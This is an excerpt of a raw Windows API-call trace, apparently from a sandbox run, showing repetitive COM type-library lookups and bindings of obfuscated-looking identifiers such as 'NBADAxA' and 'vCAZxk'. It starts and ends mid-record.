szNameBuf="NBADAxA", lHashVal=0x1023cd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.625] IUnknown:Release (This=0x665ba50) returned 0xd [0069.625] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.625] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NBADAxA", lHashVal=0x1023cd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.625] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.625] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.625] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NBADAxA", lHashVal=0x1023cd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.625] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.625] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.625] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NBADAxA", lHashVal=0x1023cd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.625] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8140a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NBADAxA") returned 8 [0069.625] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NBADAxA", lHashVal=0x1023cd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.625] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.625] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8140a | out: _Dst=0x67c2d40) returned 0x0 [0069.625] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NBADAxA") returned 0x102751 [0069.625] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_NBADAxA" | out: _Dst="_B_var_NBADAxA") returned 0x0 [0069.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_NBADAxA") returned 15 [0069.625] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.625] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NBADAxA", lHashVal=0x102751, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.625] IUnknown:Release (This=0x665ba50) returned 0xd [0069.625] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.625] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NBADAxA", lHashVal=0x102751, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.626] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.626] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.626] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NBADAxA", lHashVal=0x102751, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.626] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.626] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.626] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NBADAxA", lHashVal=0x102751, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.626] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.626] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.626] IUnknown:Release (This=0x665ba50) returned 0xd [0069.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8705ee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_NBADAxA") returned 15 [0069.626] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NBADAxA", lHashVal=0x102751, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.626] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8140a | out: _Dst=0x144ec0) returned 0x0 [0069.626] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XAcDABC", lHashVal=0x109bec, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b813e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XAcDABC") returned 8 [0069.626] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XAcDABC", lHashVal=0x109bec, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b813e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XAcDABC") returned 8 [0069.626] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XAcDABC", lHashVal=0x109bec, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.626] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAcDABC") returned 0x109bec [0069.626] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="XAcDABC" | out: _Dst="XAcDABC") returned 0x0 [0069.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="XAcDABC") returned 8 [0069.626] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.626] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XAcDABC", lHashVal=0x109bec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.627] IUnknown:Release (This=0x665ba50) returned 0xd [0069.627] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.627] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XAcDABC", lHashVal=0x109bec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.627] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.627] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.627] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XAcDABC", lHashVal=0x109bec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.627] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.627] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.627] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XAcDABC", lHashVal=0x109bec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.627] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b813e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XAcDABC") returned 8 [0069.627] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XAcDABC", lHashVal=0x109bec, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.627] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.627] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b813e2 | out: _Dst=0x67c2d40) returned 0x0 [0069.627] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XAcDABC") returned 0x109f70 [0069.627] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_XAcDABC" | out: _Dst="_B_var_XAcDABC") returned 0x0 [0069.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_XAcDABC") returned 15 [0069.627] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.627] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XAcDABC", lHashVal=0x109f70, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.627] IUnknown:Release (This=0x665ba50) returned 0xd [0069.627] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.627] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XAcDABC", lHashVal=0x109f70, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.627] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.627] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.627] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XAcDABC", lHashVal=0x109f70, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.627] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.627] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.627] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XAcDABC", lHashVal=0x109f70, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.628] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.628] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.628] IUnknown:Release (This=0x665ba50) returned 0xd [0069.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87061e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_XAcDABC") returned 15 [0069.628] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XAcDABC", lHashVal=0x109f70, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.628] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b813e2 | out: _Dst=0x144ec0) returned 0x0 [0069.628] ITypeComp:RemoteBind (in: This=0x665ba60, szName="AAx4BBB", lHashVal=0x10ab06, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8145a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="AAx4BBB") returned 8 [0069.628] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="AAx4BBB", lHashVal=0x10ab06, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8145a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="AAx4BBB") returned 8 [0069.628] ITypeComp:RemoteBind (in: This=0x665bd30, szName="AAx4BBB", lHashVal=0x10ab06, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.628] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AAx4BBB") returned 0x10ab06 [0069.628] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="AAx4BBB" | out: _Dst="AAx4BBB") returned 0x0 [0069.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="AAx4BBB") returned 8 [0069.628] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.628] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="AAx4BBB", lHashVal=0x10ab06, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.628] IUnknown:Release (This=0x665ba50) returned 0xd [0069.628] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.628] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="AAx4BBB", lHashVal=0x10ab06, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.628] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.628] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.628] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="AAx4BBB", lHashVal=0x10ab06, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.628] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.629] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.629] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="AAx4BBB", lHashVal=0x10ab06, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.629] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8145a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="AAx4BBB") returned 8 [0069.629] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="AAx4BBB", lHashVal=0x10ab06, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.629] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.629] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8145a | out: _Dst=0x67c2d40) returned 0x0 [0069.629] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AAx4BBB") returned 0x109f09 [0069.629] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_AAx4BBB" | out: _Dst="_B_var_AAx4BBB") returned 0x0 [0069.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_AAx4BBB") returned 15 [0069.629] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.629] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_AAx4BBB", lHashVal=0x109f09, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.629] IUnknown:Release (This=0x665ba50) returned 0xd [0069.629] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.629] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_AAx4BBB", lHashVal=0x109f09, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.629] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.629] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.629] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_AAx4BBB", lHashVal=0x109f09, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.629] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.629] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.629] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_AAx4BBB", lHashVal=0x109f09, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.629] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.629] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.629] IUnknown:Release (This=0x665ba50) returned 0xd [0069.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87064e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_AAx4BBB") returned 15 [0069.629] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_AAx4BBB", lHashVal=0x109f09, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x42003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x42003400000000, pDummy=0x0) returned 0x0 [0069.630] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8145a | out: _Dst=0x144ec0) returned 0x0 [0069.630] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vCAZxk", lHashVal=0x10dfca, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81482, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vCAZxk") returned 7 [0069.630] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vCAZxk", lHashVal=0x10dfca, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81482, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vCAZxk") returned 7 [0069.630] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vCAZxk", lHashVal=0x10dfca, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.630] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vCAZxk") returned 0x10dfca [0069.630] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="vCAZxk" | out: _Dst="vCAZxk") returned 0x0 [0069.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="vCAZxk") returned 7 [0069.630] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.630] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vCAZxk", lHashVal=0x10dfca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.630] IUnknown:Release (This=0x665ba50) returned 0xd [0069.630] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.631] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vCAZxk", lHashVal=0x10dfca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.631] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.631] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.631] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vCAZxk", lHashVal=0x10dfca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.631] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.631] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.631] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vCAZxk", lHashVal=0x10dfca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.631] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81482, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="vCAZxk") returned 7 [0069.631] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vCAZxk", lHashVal=0x10dfca, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.631] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.631] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81482 | out: _Dst=0x67c2d40) returned 0x0 [0069.631] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vCAZxk") returned 0x105a34 [0069.631] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_vCAZxk" | out: _Dst="_B_var_vCAZxk") returned 0x0 [0069.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_vCAZxk") returned 14 [0069.631] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.631] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vCAZxk", lHashVal=0x105a34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.631] IUnknown:Release (This=0x665ba50) returned 0xd [0069.631] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.631] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vCAZxk", lHashVal=0x105a34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.631] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.631] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.631] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vCAZxk", lHashVal=0x105a34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.631] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.631] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.631] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vCAZxk", lHashVal=0x105a34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.632] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.632] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.632] IUnknown:Release (This=0x665ba50) returned 0xd [0069.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87067e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_vCAZxk") returned 14 [0069.632] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vCAZxk", lHashVal=0x105a34, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x78005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x78005a00000000, pDummy=0x0) returned 0x0 [0069.632] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81482 | out: _Dst=0x144ec0) returned 0x0 [0069.632] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EAcAUwx", lHashVal=0x101484, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814aa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAcAUwx") returned 8 [0069.632] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EAcAUwx", lHashVal=0x101484, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, 